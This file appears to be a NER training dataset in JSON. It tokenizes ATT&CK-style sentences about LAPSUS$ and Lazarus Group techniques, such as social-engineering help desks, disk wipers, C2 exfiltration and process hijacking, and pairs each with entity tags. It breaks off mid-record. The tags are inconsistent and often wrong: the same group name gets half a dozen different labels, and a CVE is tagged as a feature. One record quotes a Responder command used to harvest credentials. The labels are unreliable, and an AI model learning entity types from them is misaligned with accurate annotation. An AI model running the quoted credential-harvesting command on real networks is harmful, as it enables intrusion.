{ - "tokens": [ - "LAPSUS$", - "has", - "leverage", - "NordVPN", - "for", - "its", - "egress", - "points", - "when", - "targeting", - "intended", - "victims." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "purchased", - "credentials", - "and", - "session", - "tokens", - "from", - "criminal", - "underground", - "forums." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "shut", - "down", - "virtual", - "machines", - "from", - "within", - "a", - "victim's", - "on-premise", - "VMware", - "ESXi", - "infrastructure." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "searched", - "a", - "victim's", - "network", - "for", - "collaboration", - "platforms", - "like", - "SharePoint", - "to", - "discover", - "further", - "high-privilege", - "account", - "credentials." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "called", - "victims'", - "help", - "desk", - "to", - "convince", - "the", - "support", - "personnel", - "to", - "reset", - "a", - "privileged", - "account’s", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "obtained", - "tools", - "such", - "as", - "RVTools", - "and", - "AD", - "Explorer", - "for", - "their", - "operations." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "accessed", - "internet-facing", - "identity", - "providers", - "such", - "as", - "Azure", - "Active", - "Directory", - "and", - "Okta", - "to", - "target", - "specific", - "organizations." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Org", - "I-Org", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "O", - "O", - "I-Org", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "recruited", - "target", - "organization", - "employees", - "or", - "contractors", - "who", - "provide", - "credentials", - "and", - "approve", - "an", - "associated", - "MFA", - "prompt,", - "or", - "install", - "remote", - "management", - "software", - "onto", - "a", - "corporate", - "workstation,", - "allowing", - "LAPSUS$", - "to", - "take", - "control", - "of", - "an", - "authenticated", - "system." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "I-Org", - "I-Org", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "used", - "compromised", - "credentials", - "and/or", - "session", - "tokens", - "to", - "gain", - "access", - "into", - "a", - "victim's", - "VPN,", - "VDI,", - "RDP,", - "and", - "IAMs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "I-Tool", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "LAPSUS$", - "has", - "used", - "VPS", - "hosting", - "providers", - "for", - "infrastructure." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "malware", - "WhiskeyDelta-Two", - "contains", - "a", - "function", - "that", - "attempts", - "to", - "rename", - "the", - "administrator’s", - "account." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "malware", - "IndiaIndia", - "obtains", - "and", - "sends", - "to", - "its", - "C2", - "server", - "the", - "title", - "of", - "the", - "window", - "for", - "each", - "running", - "process.", - "The", - "KilaAlfa", - "keylogger", - "also", - "reports", - "the", - "title", - "of", - "the", - "window", - "in", - "the", - "foreground." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "compressed", - "exfiltrated", - "data", - "with", - "RAR", - "and", - "used", - "RomeoDelta", - "malware", - "to", - "archive", - "specified", - "directories", - "in", - ".zip", - "format,", - "encrypt", - "the", - ".zip", - "file,", - "and", - "upload", - "it", - "to", - "C2." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Lazarus", - "Group", - "malware", - "sample", - "encrypts", - "data", - "using", - "a", - "simple", - "byte", - "based", - "XOR", - "operation", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "malware", - "IndiaIndia", - "saves", - "information", - "gathered", - "about", - "the", - "victim", - "to", - "a", - "file", - "that", - "is", - "compressed", - "with", - "Zlib,", - "encrypted,", - "and", - "uploaded", - "to", - "a", - "C2", - "server." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "used", - "GitHub", - "as", - "C2,", - "pulling", - "hosted", - "image", - "payloads", - "then", - "committing", - "command", - "execution", - "output", - "to", - "files", - "in", - "specific", - "directories." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "malware", - "WhiskeyAlfa-Three", - "modifies", - "sector", - "0", - "of", - "the", - "Master", - "Boot", - "Record", - "(MBR)", - "to", - "ensure", - "that", - "the", - "malware", - "will", - "persist", - "even", - "if", - "a", - "victim", - "machine", - "shuts", - "down." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "routinely", - "deleted", - "log", - "files", - "on", - "a", - "compromised", - "router,", - "including", - "automatic", - "log", - "deletion", - "through", - "the", - "use", - "of", - "the", - "logrotate", - "utility." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-OffAct", - "B-Way", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "digitally", - "signed", - "malware", - "and", - "utilities", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "keylogger", - "KiloAlfa", - "obtains", - "user", - "tokens", - "from", - "interactive", - "sessions", - "to", - "execute", - "itself", - "with", - "API", - "call", - "<code>CreateProcessAsUserA</code>", - "under", - "that", - "user's", - "context." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "replaced", - "`win_fw.dll`,", - "an", - "internal", - "component", - "that", - "is", - "executed", - "during", - "IDA", - "Pro", - "installation,", - "with", - "a", - "malicious", - "DLL", - "to", - "download", - "and", - "execute", - "a", - "payload." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "used", - "a", - "custom", - "secure", - "delete", - "function", - "to", - "overwrite", - "file", - "contents", - "with", - "data", - "from", - "heap", - "memory." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "collected", - "data", - "and", - "files", - "from", - "compromised", - "networks." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "used", - "shellcode", - "within", - "macros", - "to", - "decrypt", - "and", - "manually", - "map", - "DLLs", - "and", - "shellcode", - "into", - "memory", - "at", - "runtime." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "obtained", - "SSL", - "certificates", - "for", - "their", - "C2", - "domains." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Various", - "Lazarus", - "Group", - "malware", - "modifies", - "the", - "Windows", - "firewall", - "to", - "allow", - "incoming", - "connections", - "or", - "disable", - "it", - "entirely", - "using", - "netsh." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "malware", - "TangoDelta", - "attempts", - "to", - "terminate", - "various", - "processes", - "associated", - "with", - "McAfee.", - "Additionally,", - "Lazarus", - "Group", - "malware", - "SHARPKNOT", - "disables", - "the", - "Microsoft", - "Windows", - "System", - "Event", - "Notification", - "and", - "Alerter", - "services.." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "used", - "malware", - "like", - "WhiskeyAlfa", - "to", - "overwrite", - "the", - "first", - "64MB", - "of", - "every", - "drive", - "with", - "a", - "mix", - "of", - "static", - "and", - "random", - "buffers.", - "A", - "similar", - "process", - "is", - "then", - "used", - "to", - "wipe", - "content", - "in", - "logical", - "drives", - "and,", - "finally,", - "attempt", - "to", - "wipe", - "every", - "byte", - "of", - "every", - "sector", - "on", - "every", - "drive.", - "WhiskeyBravo", - "can", - "be", - "used", - "to", - "overwrite", - "the", - "first", - "4.9MB", - "of", - "physical", - "drives.", - "WhiskeyDelta", - "can", - "overwrite", - "the", - "first", - "132MB", - "or", - "1.5MB", - "of", - "each", - "drive", - "with", - "random", - "data", - "from", - "heap", - "memory." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "malware", - "SHARPKNOT", - "overwrites", - "and", - "deletes", - "the", - "Master", - "Boot", - "Record", - "(MBR)", - "on", - "the", - "victim's", - "machine", - "and", - "has", - "possessed", - "MBR", - "wiper", - "malware", - "since", - "at", - "least", - "2009." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "acquired", - "domains", - "related", - "to", - "their", - "campaigns", - "to", - "act", - "as", - "distribution", - "points", - "and", - "C2", - "channels." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "delivered", - "RATANKBA", - "and", - "other", - "malicious", - "code", - "to", - "victims", - "via", - "a", - "compromised", - "legitimate", - "website." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "used", - "a", - "custom", - "hashing", - "method", - "to", - "resolve", - "APIs", - "used", - "in", - "shellcode." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Lazarus", - "Group", - "malware", - "sample", - "performs", - "reflective", - "DLL", - "injection." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "I-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "created", - "new", - "email", - "accounts", - "for", - "spearphishing", - "operations." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "collected", - "email", - "addresses", - "belonging", - "to", - "various", - "departments", - "of", - "a", - "targeted", - "organization", - "which", - "were", - "used", - "in", - "follow-on", - "phishing", - "campaigns." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "used", - "multiple", - "types", - "of", - "encryption", - "and", - "encoding", - "for", - "their", - "payloads,", - "including", - "AES,", - "Caracachs,", - "RC4,", - "XOR,", - "Base64,", - "and", - "other", - "tricks", - "such", - "as", - "creating", - "aliases", - "in", - "code", - "for", - "Native", - "API", - "function", - "names." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "exfiltrated", - "data", - "and", - "files", - "over", - "a", - "C2", - "channel", - "through", - "its", - "various", - "tools", - "and", - "malware." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "malware", - "SierraBravo-Two", - "generates", - "an", - "email", - "message", - "via", - "SMTP", - "containing", - "information", - "about", - "newly", - "infected", - "victims." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "exploited", - "Adobe", - "Flash", - "vulnerability", - "CVE-2018-4878", - "for", - "execution." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "I-Exp", - "I-Exp", - "I-Exp", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "used", - "multiple", - "proxies", - "to", - "obfuscate", - "network", - "traffic", - "from", - "victims." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "malware", - "SierraAlfa", - "sends", - "data", - "to", - "one", - "of", - "the", - "hard-coded", - "C2", - "servers", - "chosen", - "at", - "random,", - "and", - "if", - "the", - "transmission", - "fails,", - "chooses", - "a", - "new", - "C2", - "server", - "to", - "attempt", - "the", - "transmission", - "again." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "malware", - "has", - "deleted", - "files", - "in", - "various", - "ways,", - "including", - "\"suicide", - "scripts\"", - "to", - "delete", - "malware", - "binaries", - "from", - "the", - "victim.", - "Lazarus", - "Group", - "also", - "uses", - "secure", - "file", - "deletion", - "to", - "delete", - "files", - "from", - "the", - "victim." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "malware", - "can", - "use", - "a", - "common", - "function", - "to", - "identify", - "target", - "files", - "by", - "their", - "extension,", - "and", - "some", - "also", - "enumerate", - "files", - "and", - "directories,", - "including", - "a", - "Destover-like", - "variant", - "that", - "lists", - "files", - "and", - "gathers", - "information", - "for", - "all", - "drives." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "studied", - "publicly", - "available", - "information", - "about", - "a", - "targeted", - "organization", - "to", - "tailor", - "spearphishing", - "efforts", - "against", - "specific", - "departments", - "and/or", - "individuals." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "used", - "a", - "VBA", - "Macro", - "to", - "set", - "its", - "file", - "attributes", - "to", - "System", - "and", - "Hidden", - "and", - "has", - "named", - "files", - "with", - "a", - "dot", - "prefix", - "to", - "hide", - "them", - "from", - "the", - "Finder", - "application." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "restored", - "malicious", - "KernelCallbackTable", - "code", - "to", - "its", - "original", - "state", - "after", - "the", - "process", - "execution", - "flow", - "has", - "been", - "hijacked." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "persistence", - "mechanisms", - "have", - "used", - "<code>forfiles.exe</code>", - "to", - "execute", - ".htm", - "files." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "downloaded", - "files,", - "malware,", - "and", - "tools", - "from", - "its", - "C2", - "onto", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "replaced", - "the", - "background", - "wallpaper", - "of", - "systems", - "with", - "a", - "threatening", - "image", - "after", - "rendering", - "the", - "system", - "unbootable", - "with", - "a", - "Disk", - "Structure", - "Wipe." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "used", - "a", - "compromised", - "router", - "to", - "serve", - "as", - "a", - "proxy", - "between", - "a", - "victim", - "network's", - "corporate", - "and", - "restricted", - "segments." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "abused", - "the", - "<code>KernelCallbackTable</code>", - "to", - "hijack", - "process", - "control", - "flow", - "and", - "execute", - "shellcode." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "malware", - "KiloAlfa", - "contains", - "keylogging", - "functionality." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "executed", - "Responder", - "using", - "the", - "command", - "<code>[Responder", - "file", - "path]", - "-i", - "[IP", - "address]", - "-rPv</code>", - "on", - "a", - "compromised", - "host", - "to", - "harvest", - "credentials", - "and", - "move", - "laterally." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "malware", - "IndiaIndia", - "saves", - "information", - "gathered", - "about", - "the", - "victim", - "to", - "a", - "file", - "that", - "is", - "saved", - "in", - "the", - "%TEMP%", - "directory,", - "then", - "compressed,", - "encrypted,", - "and", - "uploaded", - "to", - "a", - "C2", - "server." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "attempted", - "to", - "get", - "users", - "to", - "launch", - "a", - "malicious", - "Microsoft", - "Word", - "attachment", - "delivered", - "via", - "a", - "spearphishing", - "email." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "developed", - "custom", - "malware", - "for", - "use", - "in", - "their", - "operations." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "used", - "a", - "scheduled", - "task", - "named", - "`SRCheck`", - "to", - "mask", - "the", - "execution", - "of", - "a", - "malicious", - ".dll." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "renamed", - "malicious", - "code", - "to", - "disguise", - "it", - "as", - "Microsoft's", - "narrator", - "and", - "other", - "legitimate", - "files." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "used", - "<code>mshta.exe</code>", - "to", - "execute", - "HTML", - "pages", - "downloaded", - "by", - "initial", - "access", - "documents." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "used", - "multi-stage", - "malware", - "components", - "that", - "inject", - "later", - "stages", - "into", - "separate", - "processes." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "used", - "the", - "Windows", - "API", - "<code>ObtainUserAgentString</code>", - "to", - "obtain", - "the", - "User-Agent", - "from", - "a", - "compromised", - "host", - "to", - "connect", - "to", - "a", - "C2", - "server.", - "Lazarus", - "Group", - "has", - "also", - "used", - "various,", - "often", - "lesser", - "known,", - "functions", - "to", - "perform", - "various", - "types", - "of", - "Discovery", - "and", - "Process", - "Injection." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "used", - "nmap", - "from", - "a", - "router", - "VM", - "to", - "scan", - "ports", - "on", - "systems", - "within", - "the", - "restricted", - "segment", - "of", - "an", - "enterprise", - "network." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "Lazarus", - "Group", - "malware", - "uses", - "a", - "list", - "of", - "ordered", - "port", - "numbers", - "to", - "choose", - "a", - "port", - "for", - "C2", - "traffic,", - "creating", - "port-protocol", - "mismatches." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "malware", - "attempts", - "to", - "connect", - "to", - "Windows", - "shares", - "for", - "lateral", - "movement", - "by", - "using", - "a", - "generated", - "list", - "of", - "usernames,", - "which", - "center", - "around", - "permutations", - "of", - "the", - "username", - "Administrator,", - "and", - "weak", - "passwords." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Lazarus", - "Group", - "has", - "used", - "PowerShell", - "to", - "execute", - 